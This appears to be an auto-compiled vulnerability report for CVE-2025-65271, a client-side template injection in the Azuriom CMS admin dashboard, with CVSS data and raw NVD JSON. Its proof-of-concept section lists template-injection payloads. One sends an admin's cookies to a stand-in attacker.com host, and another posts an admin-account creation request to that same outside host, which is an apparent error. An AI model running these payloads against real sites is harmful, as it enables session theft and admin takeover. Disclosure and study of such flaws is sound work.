Security Vulnerability Report
CVE-2025-65271 CVSS 8.8 HIGH

Published: 2025-12-08 19:15:51
Last Modified: 2025-12-12 15:11:07

Description

Client-side template injection (CSTI) in Azuriom CMS admin dashboard allows a low-privilege user to execute arbitrary template code in the context of an administrator's session. This can occur via plugins or dashboard components that render untrusted user input, potentially enabling privilege escalation to an administrative account. Fixed in Azuriom 1.2.7.

CVSS Details

CVSS Score: 8.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:azuriom:azuriom:*:*:*:*:*:*:*:* - VULNERABLE
Azuriom CMS < 1.2.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CVE-2025-65271 PoC - Azuriom CMS Client-Side Template Injection -->
<!-- Low-privilege user injects malicious template code via plugin/dashboard component -->
<!-- When admin views the page, arbitrary JavaScript executes in admin context -->

<!-- Example 1: Basic XSS via template injection -->
{{constructor.constructor('alert(document.cookie)')()}}

<!-- Example 2: Session hijacking payload -->
{{{constructor.constructor('fetch("https://attacker.com/steal?c="+document.cookie)')()}}}

<!-- Example 3: Privilege escalation to admin -->
{{constructor.constructor('fetch("https://attacker.com/api/admin/create",{method:"POST",body:JSON.stringify({username:"hacker",password:"P@ssw0rd",role:"admin"})})')()}}

<!-- Example 4: Using AngularJS template injection (if applicable) -->
{{$on.constructor('alert("CSTI")')()}}

<!-- Attack scenario: -->
<!-- 1. Attacker (low-privilege) injects payload into plugin setting or dashboard widget -->
<!-- 2. Payload is stored and rendered when admin visits the affected page -->
<!-- 3. Malicious JS executes in admin browser with admin privileges -->
<!-- 4. Attacker exfiltrates admin session or performs admin actions -->

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65271", "sourceIdentifier": "[email protected]", "published": "2025-12-08T19:15:50.540", "lastModified": "2025-12-12T15:11:07.460", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Client-side template injection (CSTI) in Azuriom CMS admin dashboard allows a low-privilege user to execute arbitrary template code in the context of an administrator's session. This can occur via plugins or dashboard components that render untrusted user input, potentially enabling privilege escalation to an administrative account. Fixed in Azuriom 1.2.7."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:azuriom:azuriom:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.2.7", "matchCriteriaId": "4FA4582B-9014-408F-BEE7-3FEF69CC8667"}]}]}], "references": [{"url": "https://github.com/1337Skid/CVE-2025-65271", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/Azuriom/Azuriom", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/Azuriom/Azuriom/commit/0289175547319add814dcb526e8ba034f1ebc3ec", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://www.github.com/Azuriom/Azuriom", "source": "[email protected]", "tags": ["Product"]}, 
{"url": "https://www.github.com/Azuriom/Azuriom/commit/0289175547319add814dcb526e8ba034f1ebc3ec", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/1337Skid/CVE-2025-65271", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Third Party Advisory"]}]}}